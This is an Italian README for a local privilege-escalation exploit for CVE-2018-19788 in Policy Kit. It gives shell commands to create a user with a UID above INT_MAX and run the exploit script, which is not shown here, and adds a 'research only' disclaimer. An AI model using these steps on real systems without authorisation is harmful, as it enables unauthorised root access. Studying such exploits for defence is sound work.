
Exploit facile e stupido per CVE-2018-19788
Semplice exploit per CVE-2018-19788
Per usarlo, devi creare un utente con UID > INT_MAX in Policy Kit oppure avere già un utente a bassi privilegi con tale UID.
L'UID può essere specificato nella creazione dell'utente come segue, e utilizzato prima dell'esecuzione dello script:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Nota: questo è solo a scopo di ricerca e sei responsabile del tuo utilizzo di qualsiasi codice trovato in questo repository o in qualsiasi altro, come dettato dal buon senso.